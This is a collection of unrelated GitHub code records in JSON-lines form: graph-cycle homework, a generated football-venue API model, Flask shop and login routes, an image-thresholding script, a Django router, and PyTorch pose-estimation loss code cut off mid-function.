queue import Queue\n\ndef detect_cycle(v0, u0, V, E):\n visited = [False] * V\n visited[v0] = True\n predecessors = [None] * V\n\n queue = Queue()\n queue.enqueue(v0)\n while (not queue.empty):\n v = queue.dequeue()\n for u in E[v]:\n if (v == v0 and u == u0):\n continue\n if (not visited[u]):\n visited[u] = True\n predecessors[u] = v\n\n if (u == u0):\n res = [u0]\n while (predecessors[res[-1]] is not None):\n res.append(predecessors[res[-1]])\n res.append(u0)\n return res\n \n queue.enqueue(u)\n\n\n return None \n\nV = 8\n\nE = [\n [1, 4], # 0\n [0, 3], # 1\n [3, 6], # 2\n [1, 2, 5], # 3\n [0, 5, 7], # 4\n [3, 4, 6, 7], # 5\n [2, 5], # 6\n [4, 5] # 7\n]\n\nP = detect_cycle(3, 1, V, E)\nprint(P)","repo_name":"mw-mff-uk/NTIN060","sub_path":"hw/hw3/hw3_1.py","file_name":"hw3_1.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40646367190","text":"# coding: utf-8\n\n\"\"\"\n College Football Data API\n\n This is an API for accessing all sorts of college football data. Please note that API keys should be supplied with \\\"Bearer \\\" prepended (e.g. \\\"Bearer your_key\\\"). API keys can be acquired from the CollegeFootballData.com website. # noqa: E501\n\n OpenAPI spec version: 4.5.1\n Contact: admin@collegefootballdata.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cfbd.configuration import Configuration\n\n\nclass Venue(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'int',\n 'name': 'str',\n 'capacity': 'int',\n 'grass': 'bool',\n 'city': 'str',\n 'state': 'str',\n 'zip': 'str',\n 'country_code': 'str',\n 'location': 'VenueLocation',\n 'elevation': 'float',\n 'year_constructed': 'int',\n 'dome': 'bool',\n 'timezone': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'name': 'name',\n 'capacity': 'capacity',\n 'grass': 'grass',\n 'city': 'city',\n 'state': 'state',\n 'zip': 'zip',\n 'country_code': 'country_code',\n 'location': 'location',\n 'elevation': 'elevation',\n 'year_constructed': 'year_constructed',\n 'dome': 'dome',\n 'timezone': 'timezone'\n }\n\n def __init__(self, id=None, name=None, capacity=None, grass=None, city=None, state=None, zip=None, country_code=None, location=None, elevation=None, year_constructed=None, dome=None, timezone=None, _configuration=None): # noqa: E501\n \"\"\"Venue - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._id = None\n self._name = None\n self._capacity = None\n self._grass = None\n self._city = None\n self._state = None\n self._zip = None\n self._country_code = None\n self._location = None\n self._elevation = None\n self._year_constructed = None\n self._dome = None\n self._timezone = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if name is not None:\n self.name = name\n if capacity is not None:\n self.capacity = capacity\n if grass is not None:\n self.grass = grass\n if city is not None:\n self.city = city\n if state is not None:\n self.state = state\n if zip is not None:\n self.zip = zip\n if country_code is not None:\n self.country_code = country_code\n if location is not None:\n self.location = location\n if elevation is not None:\n self.elevation = elevation\n if year_constructed is not None:\n self.year_constructed = year_constructed\n if dome is not None:\n self.dome = dome\n if timezone is not None:\n self.timezone = timezone\n\n @property\n def id(self):\n \"\"\"Gets the id of this Venue. # noqa: E501\n\n\n :return: The id of this Venue. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this Venue.\n\n\n :param id: The id of this Venue. # noqa: E501\n :type: int\n \"\"\"\n\n self._id = id\n\n @property\n def name(self):\n \"\"\"Gets the name of this Venue. # noqa: E501\n\n\n :return: The name of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this Venue.\n\n\n :param name: The name of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def capacity(self):\n \"\"\"Gets the capacity of this Venue. # noqa: E501\n\n\n :return: The capacity of this Venue. # noqa: E501\n :rtype: int\n \"\"\"\n return self._capacity\n\n @capacity.setter\n def capacity(self, capacity):\n \"\"\"Sets the capacity of this Venue.\n\n\n :param capacity: The capacity of this Venue. # noqa: E501\n :type: int\n \"\"\"\n\n self._capacity = capacity\n\n @property\n def grass(self):\n \"\"\"Gets the grass of this Venue. # noqa: E501\n\n\n :return: The grass of this Venue. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._grass\n\n @grass.setter\n def grass(self, grass):\n \"\"\"Sets the grass of this Venue.\n\n\n :param grass: The grass of this Venue. # noqa: E501\n :type: bool\n \"\"\"\n\n self._grass = grass\n\n @property\n def city(self):\n \"\"\"Gets the city of this Venue. # noqa: E501\n\n\n :return: The city of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._city\n\n @city.setter\n def city(self, city):\n \"\"\"Sets the city of this Venue.\n\n\n :param city: The city of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._city = city\n\n @property\n def state(self):\n \"\"\"Gets the state of this Venue. # noqa: E501\n\n\n :return: The state of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this Venue.\n\n\n :param state: The state of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._state = state\n\n @property\n def zip(self):\n \"\"\"Gets the zip of this Venue. # noqa: E501\n\n\n :return: The zip of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._zip\n\n @zip.setter\n def zip(self, zip):\n \"\"\"Sets the zip of this Venue.\n\n\n :param zip: The zip of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._zip = zip\n\n @property\n def country_code(self):\n \"\"\"Gets the country_code of this Venue. # noqa: E501\n\n\n :return: The country_code of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_code\n\n @country_code.setter\n def country_code(self, country_code):\n \"\"\"Sets the country_code of this Venue.\n\n\n :param country_code: The country_code of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_code = country_code\n\n @property\n def location(self):\n \"\"\"Gets the location of this Venue. # noqa: E501\n\n\n :return: The location of this Venue. # noqa: E501\n :rtype: VenueLocation\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location):\n \"\"\"Sets the location of this Venue.\n\n\n :param location: The location of this Venue. # noqa: E501\n :type: VenueLocation\n \"\"\"\n\n self._location = location\n\n @property\n def elevation(self):\n \"\"\"Gets the elevation of this Venue. # noqa: E501\n\n\n :return: The elevation of this Venue. # noqa: E501\n :rtype: float\n \"\"\"\n return self._elevation\n\n @elevation.setter\n def elevation(self, elevation):\n \"\"\"Sets the elevation of this Venue.\n\n\n :param elevation: The elevation of this Venue. # noqa: E501\n :type: float\n \"\"\"\n\n self._elevation = elevation\n\n @property\n def year_constructed(self):\n \"\"\"Gets the year_constructed of this Venue. # noqa: E501\n\n\n :return: The year_constructed of this Venue. # noqa: E501\n :rtype: int\n \"\"\"\n return self._year_constructed\n\n @year_constructed.setter\n def year_constructed(self, year_constructed):\n \"\"\"Sets the year_constructed of this Venue.\n\n\n :param year_constructed: The year_constructed of this Venue. # noqa: E501\n :type: int\n \"\"\"\n\n self._year_constructed = year_constructed\n\n @property\n def dome(self):\n \"\"\"Gets the dome of this Venue. # noqa: E501\n\n\n :return: The dome of this Venue. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._dome\n\n @dome.setter\n def dome(self, dome):\n \"\"\"Sets the dome of this Venue.\n\n\n :param dome: The dome of this Venue. # noqa: E501\n :type: bool\n \"\"\"\n\n self._dome = dome\n\n @property\n def timezone(self):\n \"\"\"Gets the timezone of this Venue. # noqa: E501\n\n\n :return: The timezone of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._timezone\n\n @timezone.setter\n def timezone(self, timezone):\n \"\"\"Sets the timezone of this Venue.\n\n\n :param timezone: The timezone of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._timezone = timezone\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(Venue, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Venue):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Venue):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"CFBD/cfbd-python","sub_path":"cfbd/models/venue.py","file_name":"venue.py","file_ext":"py","file_size_in_byte":10774,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"72878284393","text":"from flask import Blueprint, render_template, request, redirect, url_for, flash\r\nfrom flask_login import current_user, login_required\r\nfrom app.models import Items, Cart\r\nimport json\r\n\r\nshop = Blueprint('shop', __name__, template_folder='shop_templates')\r\n\r\n@shop.route('/shop')\r\ndef view_shop():\r\n products = Items.query.all() # Fetch all items\r\n # Create a DICT to itterate through in Jinja\r\n items = {}\r\n for item in products:\r\n items[item.id] = {}\r\n items[item.id]['name'] = item.item_name\r\n items[item.id]['icon'] = item.item_icon\r\n items[item.id]['description'] = item.item_description\r\n items[item.id]['price'] = item.item_price\r\n \r\n return render_template('shop.html', prods=items)\r\n\r\n@shop.route('/shop/cart/removeall')\r\n@login_required\r\ndef remove_all():\r\n cart = Cart.query.get(current_user.id)\r\n if cart:\r\n cart.delete_from_db()\r\n return redirect(url_for('shop.view_shop'))\r\n else:\r\n return redirect(url_for('shop.view_cart'))\r\n\r\n@shop.route('/shop/view/')\r\ndef view_product(id):\r\n product = Items.query.get(id)\r\n if product:\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n flash('That product was not found')\r\n return redirect(url_for('shop.view_shop'))\r\n \r\n@shop.route('/shop/cart/remove/')\r\n@login_required\r\ndef remove_from_cart(id):\r\n cart = Cart.query.get(current_user.id)\r\n if cart:\r\n cart_data = json.loads(cart.items)\r\n del cart_data[str(id)]\r\n cart.items = json.dumps(cart_data)\r\n cart.update_db()\r\n return redirect(url_for('shop.view_cart'))\r\n else:\r\n return redirect(url_for('shop.view_shop'))\r\n\r\n@shop.route('/shop/cart/add/', methods =['GET','POST'])\r\n@login_required\r\ndef add_to_cart(id):\r\n product = Items.query.get(id)\r\n cart = Cart.query.get(current_user.id)\r\n if product:\r\n if cart:\r\n cart_data = json.loads(cart.items)\r\n if str(product.id) in cart_data.keys():\r\n cart_data[str(product.id)]['quantity'] = cart_data[str(product.id)]['quantity'] + 1\r\n cart.items = json.dumps(cart_data)\r\n cart.update_db()\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n cart_data[product.id] = {}\r\n cart_data[product.id]['name'] = product.item_name\r\n cart_data[product.id]['icon'] = product.item_icon\r\n cart_data[product.id]['description'] = product.item_description\r\n cart_data[product.id]['price'] = product.item_price\r\n cart_data[product.id]['quantity'] = 1\r\n cart.items = json.dumps(cart_data)\r\n cart.update_db()\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n cart_data = {}\r\n cart_data[product.id] = {}\r\n cart_data[product.id][\"name\"] = product.item_name\r\n cart_data[product.id][\"icon\"] = product.item_icon\r\n cart_data[product.id][\"description\"] = product.item_description\r\n cart_data[product.id]['price'] = product.item_price\r\n cart_data[product.id]['quantity'] = 1\r\n d = Cart(current_user.id, json.dumps(cart_data))\r\n d.save_to_db()\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n flash('That product was not found')\r\n return redirect(url_for('shop.view_shop'))\r\n\r\n\r\n@shop.route('/shop/cart/', methods =['GET','POST'])\r\n@login_required\r\ndef view_cart():\r\n items = Cart.query.get(current_user.id) # Fetch all items\r\n # Create a DICT to itterate through in Jinja\r\n cart = json.loads(items.items)\r\n if items:\r\n total = 0 #: Float\r\n items = 0 #: Int\r\n for key, value in cart.items():\r\n total += value['price']\r\n items += 1\r\n \r\n return render_template('Checkout.html', cart=cart, total=round(total, 2), items=items)\r\n else:\r\n return redirect(url_for('shop.view_shop'))\r\n","repo_name":"Anglindw/group_project-flask","sub_path":"app/shop/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70048784232","text":"\"\"\"\nSolicitar el ingreso de una clave por teclado y almacenarla en una cadena de\ncaracteres. Controlar que el string ingresado tenga entre 10 y 20 caracteres para\nque sea válido, en caso contrario mostrar un mensaje de error.\n\"\"\"\n\narray = []\n\nclave = input(\"ingresa una clave\")\nif len(clave) <10 or len(clave) >20:\n print(\"ingresa una clave correcta\")\nelse:\n array.append(clave)\n print(\"La clave se guardo exitosamente\")\n print(array)\n\n\n","repo_name":"Gestrial/Ejercicios-Python","sub_path":"Ejercicio12.py","file_name":"Ejercicio12.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39549985052","text":"from flask_app import app\nfrom flask import render_template, redirect, request, session\nfrom flask_app.models.user import User\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/register\", methods=['POST'])\ndef register():\n if not User.validate_user(request.form):\n return redirect(\"/\")\n \n user_in = User.create_user(request.form)\n one_user= User.one_user(user_in)\n session['user_id'] = one_user.id\n print(\"___USER IN VAR___\",user_in)\n print(\"___One USER IN VAR___\", one_user)\n return redirect(\"/dashboard\")\n\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n user_in_db = User.validate_login(request.form)\n\n if not user_in_db:\n return redirect(\"/\")\n\n print(\"___THIS USER LOGIN___\",user_in_db) \n\n user = User.select_by_email(request.form)\n print(\"___THIS USER ID___\", user.id)\n session['user_id'] = user.id\n\n return redirect(\"/dashboard\")\n\n\n@app.route(\"/dashboard\")\ndef dashboard():\n if not \"user_id\" in session:\n return redirect(\"/\")\n \n user_id = {\n \"id\":session['user_id']\n }\n\n user = User.one_user(user_id) \n return render_template(\"/dashboard.html\", user=user)\n\n \n@app.route(\"/logout\")\ndef logout():\n session.pop(\"user_id\", None)\n return redirect(\"/\")","repo_name":"alexpablo-code/login_and_registration","sub_path":"flask_app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38515217374","text":"import cv2\nimport numpy as np\n\ndef gray(img):\n img[:, :, 0] *= 0.0722 #B\n img[:, :, 1] *= 0.7152 #G\n img[:, :, 2] *= 0.2126 #R\n img2 = np.sum(img, axis=2).astype(np.uint8)\n return img2\n\ndef oo2tika(img):\n max_sigma = 0\n max_i = 0\n H,W = img.shape\n for i in range(1, 256):\n v0 = img[np.where(img < i)]\n w0 = len(v0)/(H*W)\n m0 = np.mean(v0) if w0 > 0 else 0.\n \n v1 = img[np.where(img >= i)] \n w1 = len(v1)/(H*W)\n m1 = np.mean(v1) if w1 > 0 else 0.\n \n sigma = w0 * w1 * ((m0 - m1)**2)\n\n if sigma > max_sigma:\n max_i = i\n max_sigma = sigma\n\n return max_i\n\n\nimg = cv2.imread('imori.jpg').astype(np.float32)\nimg2 = gray(img)\n\nth = oo2tika(img2)\nprint(th)\n\nimg3 = np.where(img2 < th, 0, 255)\ncv2.imwrite(\"out_figure4.jpg\",img3)\n","repo_name":"hirokichi-k/IM_100","sub_path":"IM1-10/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13426685082","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom .views import PostView\n\napp_name = \"publications\"\n\nROUTER = routers.SimpleRouter()\nROUTER.register(\"post\", PostView, \"post\")\n\nurlpatterns = [\n path(\"\", include(ROUTER.urls)),\n]\nurlpatterns += ROUTER.urls\n","repo_name":"Bekbolsunn/Instagram-Api","sub_path":"publications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26559531388","text":"from __future__ import division\nimport torch\nimport torch.nn as nn\nimport torch.sparse\nfrom torch.autograd import Variable\nimport numpy as np\nimport sys\nfrom torch.autograd import Function\nimport math\nfrom scipy import misc \nimport scipy\nimport functools\nfrom torch.nn import init\nfrom torch.optim import lr_scheduler\n\n###############################################################################\n# Functions\n###############################################################################\nVERSION = 4\nEPSILON = 1e-8\n\n\ndef decompose_rotation(R):\n roll = math.atan2(R[2,1], R[2,2]); \n pitch = math.atan2(-R[2,0], math.sqrt(R[2,1]*R[2,1] + R[2,2]*R[2,2])); \n yaw = math.atan2(R[1,0], R[0,0]); \n return [roll,pitch,yaw]\n\ndef decompose_up_n(up_n):\n pitch = - math.asin(up_n[0])\n\n sin_roll = up_n[1]/math.cos(pitch)\n\n roll = math.asin(sin_roll)\n return roll, pitch\n\n\ndef compose_rotation(x, y, z):\n X = np.identity(3); \n Y = np.identity(3); \n Z = np.identity(3); \n\n X[1,1] = math.cos(x)\n X[1,2] = -math.sin(x)\n X[2,1] = math.sin(x)\n X[2,2] = math.cos(x)\n\n Y[0,0] = math.cos(y)\n Y[0,2] = math.sin(y)\n Y[2,0] = -math.sin(y)\n Y[2,2] = math.cos(y)\n\n Z[0,0] = math.cos(z)\n Z[0,1] = -math.sin(z)\n Z[1,0] = math.sin(z)\n Z[1,1] = math.cos(z)\n\n # R = np.dot(Z, np.dot(Y, X))\n\n R = np.matmul(np.matmul(Z,Y),X)\n return R\n\ndef get_scheduler(optimizer, opt):\n if opt.lr_policy == 'lambda':\n def lambda_rule(epoch):\n lr_l = 1.0 - max(0, epoch + 1 + opt.epoch_count - opt.niter) / float(opt.niter_decay + 1)\n return lr_l\n scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)\n elif opt.lr_policy == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=opt.lr_decay_epoch, gamma=0.5)\n elif opt.lr_policy == 'plateau':\n scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)\n else:\n return NotImplementedError('learning rate policy [%s] is not implemented', opt.lr_policy)\n return scheduler\n\n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False, track_running_stats=True)\n elif norm_type == 'none':\n norm_layer = None\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm_type)\n return norm_layer\n\ndef print_network(net_):\n num_params = 0\n for param in net_.parameters():\n num_params += param.numel()\n #print(net_)\n #print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\nclass ExtractSMinEigenValue(Function):\n @staticmethod\n def forward(ctx, input):\n D, VL, VR = scipy.linalg.eig(input.detach().cpu().numpy(), left=True, right=True)\n\n real_idx = np.abs(D.imag) < EPSILON\n\n vl= VL[:, real_idx]\n vr = VR[:, real_idx]\n lambda_real = D[real_idx].real\n\n min_idx = np.argmin(lambda_real)\n min_lambda = lambda_real[min_idx] \n mim_vl = vl[:, min_idx].real\n min_vr = vr[:, min_idx].real\n\n # normalize vl so that vl'*vr = I\n sum_vlvr = np.dot(mim_vl, min_vr)\n mim_vl = mim_vl/sum_vlvr\n\n ctx.save_for_backward(input, \n torch.as_tensor(mim_vl, \n dtype=input.dtype, \n device=torch.device('cuda')), \n torch.as_tensor(min_vr, \n dtype=input.dtype, \n device=torch.device('cuda')))\n \n\n return torch.as_tensor(min_lambda, dtype=input.dtype, device=torch.device('cuda'))\n\n @staticmethod\n def backward(ctx, grad_output):\n input, mim_vl, min_vr = ctx.saved_tensors\n grad_weight = None\n grad_input = grad_output * torch.ger(mim_vl, min_vr)\n\n return grad_input, grad_weight\n\n\nclass JointLoss(nn.Module):\n def __init__(self, opt):\n super(JointLoss, self).__init__()\n self.opt = opt\n self.num_scales = 5\n\n self.total_loss = None\n\n def compute_cos_sim_loss(self, gt_n, pred_n, mask):\n cos_criterion= nn.CosineSimilarity(dim=1)\n num_valid_pixels = torch.sum(mask) + EPSILON\n\n cos_term = cos_criterion(gt_n, pred_n)\n\n n_term = torch.sum(mask * (1.0 - cos_term))/num_valid_pixels\n return n_term\n\n def compute_angle_error(self, pred_cam_geo_unit, \n pred_up_geo_unit, pred_weights, \n targets, stack_error=False):\n\n gt_up_vector = targets['gt_up_vector'].cuda()\n\n cos_criterion = nn.CosineSimilarity(dim=0)\n\n num_pixels = pred_cam_geo_unit.size(2) * pred_cam_geo_unit.size(3)\n num_samples = pred_cam_geo_unit.size(0)\n\n identity_mat = torch.eye(3).float().cuda()\n identity_mat_rep = identity_mat.unsqueeze(0).repeat(num_samples,1,1)#, requires_grad=False)\n # zeros_mat = Variable(torch.zeros(3).float().cuda(), requires_grad=False)\n\n weights_n = pred_weights[:, 0:1, :, :].repeat(1,3,1,1)\n weights_u = pred_weights[:, 1:2, :, :].repeat(1,3,1,1)\n weights_t = pred_weights[:, 2:3, :, :].repeat(1,3,1,1)\n\n pred_cam_n = pred_cam_geo_unit[:, 0:3, :, :] \n pred_cam_u = pred_cam_geo_unit[:, 3:6, :, :]\n pred_cam_t = pred_cam_geo_unit[:, 6:9, :, :]\n\n pred_cam_n_w = pred_cam_n * weights_n\n pred_cam_u_w = pred_cam_u * weights_u\n pred_cam_t_w = pred_cam_t * weights_t\n\n pred_cam_n_w_flat = pred_cam_n_w.view(num_samples, \n pred_cam_n_w.size(1), \n num_pixels)\n pred_cam_u_w_flat = pred_cam_u_w.view(num_samples, \n pred_cam_u_w.size(1), \n num_pixels)\n pred_cam_t_w_flat = pred_cam_t_w.view(num_samples, \n pred_cam_t_w.size(1), \n num_pixels)\n\n # M * 3 x 3N matrix\n A_w = torch.cat((pred_cam_n_w_flat, pred_cam_u_w_flat, pred_cam_t_w_flat), dim=2)\n \n pred_up_geo_unit_w = pred_weights * pred_up_geo_unit\n pred_up_geo_unit_w_flat = pred_up_geo_unit_w.view(num_samples, pred_up_geo_unit.size(1), num_pixels)\n # M * 1 * 3N\n b_w = torch.cat((pred_up_geo_unit_w_flat[:, 0:1, :], pred_up_geo_unit_w_flat[:, 1:2, :], pred_up_geo_unit_w_flat[:, 2:3, :]), dim=2)\n\n # M*3*3\n H = torch.bmm(A_w, torch.transpose(A_w, 1, 2))\n # M*3*1\n g = torch.bmm(A_w, torch.transpose(b_w, 1, 2))\n ggT = torch.bmm(g, torch.transpose(g, 1, 2))\n\n # C_mat = torch.cat( (torch.cat((-A1, -A0), dim=2), torch.cat((identity_mat, zeros_mat), dim=2)), dim=1)\n C_mat = torch.cat( (torch.cat((H, -identity_mat_rep), dim=2), torch.cat((-ggT, H), dim=2)), dim=1)\n\n if stack_error:\n total_rot_error = []\n total_roll_error = []\n total_pitch_error = []\n else:\n total_rot_error = 0.0\n total_roll_error = 0.0\n total_pitch_error = 0.0\n\n for i in range(num_samples):\n est_lambda = torch.eig(C_mat[i, :, :])\n est_lambda = est_lambda[0]\n\n img_part = est_lambda[:, 1]\n real_part = est_lambda[:, 0]\n\n min_lambda = torch.min(real_part[torch.abs(img_part.data) < 1e-6])\n\n est_up_n = torch.matmul(torch.pinverse(H[i, :, :] - min_lambda * identity_mat), g[i, :, :])\n est_up_n_norm = torch.sqrt( torch.sum(est_up_n**2) )\n est_up_n = est_up_n[:, 0]/est_up_n_norm\n\n up_diff_cos = cos_criterion(est_up_n, gt_up_vector[i, :])\n\n [pred_roll, pred_pitch] = decompose_up_n(est_up_n.cpu().numpy()) \n [gt_roll, gt_pitch] = decompose_up_n(gt_up_vector[i, :].cpu().numpy()) \n\n\n if stack_error:\n total_rot_error += [np.arccos(np.clip(up_diff_cos.item(), -1.0, 1.0)) * 180.0/math.pi]\n total_roll_error += [abs(pred_roll - gt_roll)*180.0/math.pi]\n total_pitch_error += [abs(pred_pitch - gt_pitch)*180.0/math.pi]\n else:\n total_rot_error += np.arccos(np.clip(up_diff_cos.item(), -1.0, 1.0)) * 180.0/math.pi\n total_roll_error += abs(pred_roll - gt_roll)*180.0/math.pi\n total_pitch_error += abs(pred_pitch - gt_pitch)*180.0/math.pi\n\n return total_rot_error, total_roll_error, total_pitch_error\n\n def compute_normal_gradient_loss(self, gt_n_unit, pred_n_unit, mask):\n n_diff = pred_n_unit - gt_n_unit\n mask_rep = mask.unsqueeze(1).repeat(1, gt_n_unit.size(1), 1, 1)\n # vertical gradient\n v_gradient = torch.abs(n_diff[:, :, :-2,:] - n_diff[:, :, 2:,:])\n v_mask = torch.mul(mask_rep[:, :, :-2,:], mask_rep[:, :, 2:,:])\n v_gradient = torch.mul(v_gradient, v_mask)\n # horizontal gradient\n h_gradient = torch.abs(n_diff[:, :, :, :-2] - n_diff[:, :, :, 2:])\n h_mask = torch.mul(mask_rep[:, :, :, :-2], mask_rep[:, :, :, 2:])\n h_gradient = torch.mul(h_gradient, h_mask)\n\n N = torch.sum(h_mask) + torch.sum(v_mask) + EPSILON\n gradient_loss = torch.sum(h_gradient) + torch.sum(v_gradient)\n gradient_loss = gradient_loss/(N)\n return gradient_loss\n\n def normalize_normal(self, normals):\n normals_norm = torch.sqrt( torch.sum(torch.pow(normals , 2) , 1) ).unsqueeze(1).repeat(1,3,1,1) + EPSILON\n return torch.div(normals , normals_norm)\n\n def normalize_coords(self, coords):\n coord_n = coords[:, 0:3, :, :]\n coord_u = coords[:, 3:6, :, :]\n coord_t = coords[:, 6:9, :, :]\n\n return torch.cat((self.normalize_normal(coord_n), self.normalize_normal(coord_u), self.normalize_normal(coord_t)), 1)\n\n def compute_pose_loss(self, gt_up_vector, pred_cam_geo_unit, pred_up_geo_unit, pred_weights, targets=None):\n '''\n solving poses using consraint least sqaure by solving Langrange Multipler directly\n '''\n cos_criterion = nn.CosineSimilarity(dim=0)\n\n num_pixels = pred_cam_geo_unit.size(2) * pred_cam_geo_unit.size(3)\n num_samples = pred_cam_geo_unit.size(0)\n\n identity_mat = torch.eye(3).float().cuda()\n identity_mat_rep = identity_mat.unsqueeze(0).repeat(num_samples,1,1)#, requires_grad=False)\n # zeros_mat = Variable(torch.zeros(3).float().cuda(), requires_grad=False)\n\n weights_n = pred_weights[:, 0:1, :, :].repeat(1,3,1,1)\n weights_u = pred_weights[:, 1:2, :, :].repeat(1,3,1,1)\n weights_t = pred_weights[:, 2:3, :, :].repeat(1,3,1,1)\n\n pred_cam_n = pred_cam_geo_unit[:, 0:3, :, :] \n pred_cam_u = pred_cam_geo_unit[:, 3:6, :, :]\n pred_cam_t = pred_cam_geo_unit[:, 6:9, :, :]\n\n pred_cam_n_w = pred_cam_n * weights_n\n pred_cam_u_w = pred_cam_u * weights_u\n pred_cam_t_w = pred_cam_t * weights_t\n\n pred_cam_n_w_flat = pred_cam_n_w.view(num_samples, \n pred_cam_n_w.size(1), \n num_pixels)\n pred_cam_u_w_flat = pred_cam_u_w.view(num_samples, \n pred_cam_u_w.size(1), \n num_pixels)\n pred_cam_t_w_flat = pred_cam_t_w.view(num_samples, \n pred_cam_t_w.size(1), \n num_pixels)\n\n # M * 3 x 3N matrix\n A_w = torch.cat((pred_cam_n_w_flat, \n pred_cam_u_w_flat, \n pred_cam_t_w_flat), dim=2)\n \n pred_up_geo_unit_w = pred_weights * pred_up_geo_unit\n pred_up_geo_unit_w_flat = pred_up_geo_unit_w.view(num_samples, \n pred_up_geo_unit.size(1), \n num_pixels)\n # M * 1 * 3N\n b_w = torch.cat((pred_up_geo_unit_w_flat[:, 0:1, :], \n pred_up_geo_unit_w_flat[:, 1:2, :], \n pred_up_geo_unit_w_flat[:, 2:3, :]), dim=2)\n\n # M*3*3\n H = torch.bmm(A_w, torch.transpose(A_w, 1, 2))\n # M*3*1\n g = torch.bmm(A_w, torch.transpose(b_w, 1, 2))\n ggT = torch.bmm(g, torch.transpose(g, 1, 2))\n\n # A0 = torch.bmm(H, H) - ggT\n # A1 = -2.0 * H\n\n # C_mat = torch.cat( (torch.cat((-A1, -A0), dim=2), torch.cat((identity_mat, zeros_mat), dim=2)), dim=1)\n C_mat = torch.cat( (torch.cat((H, -identity_mat_rep), dim=2), \n torch.cat((-ggT, H), dim=2)), dim=1)\n\n\n pose_term = 0.0\n\n for i in range(num_samples):\n\n if 